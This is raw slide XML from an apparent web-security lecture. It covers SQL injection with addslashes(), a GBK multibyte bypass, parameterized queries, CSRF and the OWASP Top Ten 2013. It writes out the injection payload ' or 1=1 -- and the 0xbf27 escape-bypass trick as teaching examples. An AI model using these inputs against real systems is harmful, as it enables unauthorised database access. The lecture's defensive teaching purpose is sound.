              <a:ext cx="1728" cy="1191"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd type="none" w="lg" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1333250" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1333251" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1524000"/>
            <a:ext cx="8305800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> or 1 = 1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		outputs:    “  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> or 1=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unicode attack:   (GBK) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>$user =  0x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>bf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>27</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>($user)     0x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>bf 5c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>Correct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>implementation:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 15"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6858000" y="4800600"/>
            <a:ext cx="979488" cy="685800"/>
            <a:chOff x="4464" y="3168"/>
            <a:chExt cx="617" cy="432"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1333255" name="Picture 7"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:srcRect l="65089" t="48508" r="31905" b="48581"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4464" y="3213"/>
              <a:ext cx="551" cy="387"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd type="none" w="lg" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1333256" name="Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4896" y="3168"/>
              <a:ext cx="185" cy="404"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd type="none" w="lg" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>′</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2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32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2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325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3124200"/>
            <a:ext cx="6629400" cy="1371600"/>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4F349269-159F-478B-A6FC-B0A04D180025}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1306626" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Parameterized/prepared  SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1306627" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1524000"/>
            <a:ext cx="8534400" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Builds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SQL queries by properly escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>′  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>   \′</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="100000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Example:   Parameterized SQL:    (ASP.NET 1.1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Ensures SQL arguments are properly escaped.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = new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br>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	"SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UserTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> WHERE 	</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AND </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	password = </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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dbConnection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);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@User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", Request[“user”]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a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", Request[“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”]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cmd.ExecuteReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="150000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>In PHP:    bound parameters  --  similar function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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cross Site Request Forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102405" name="Rectangle 5"/>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Top Ten </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>             (2013)</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7018634"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="762000" y="1457960"/>
          <a:ext cx="8001000" cy="4668519"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="533400"/>
                <a:gridCol w="2209800"/>
                <a:gridCol w="52578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A-1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Untrusted data is sent to an interpreter as part of a command or query.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>A-2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Authentication and Session Management</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Attacks passwords, keys, or session tokens, or exploit other implementation flaws to assume other users’ identities.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>A-3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Cross-site scripting</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>An application takes untrusted data and sends it to a web browser without proper validation or escaping</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Various implementation problems</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>…</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>expose a file, directory, or database key without access</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> control check, …misconfiguration, …missing function-level access control</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>A-8</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Cross-site request forgery</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>A</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logged-on victim’s browser sends a forged HTTP request, including the victim’s session cookie and other authentication information</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
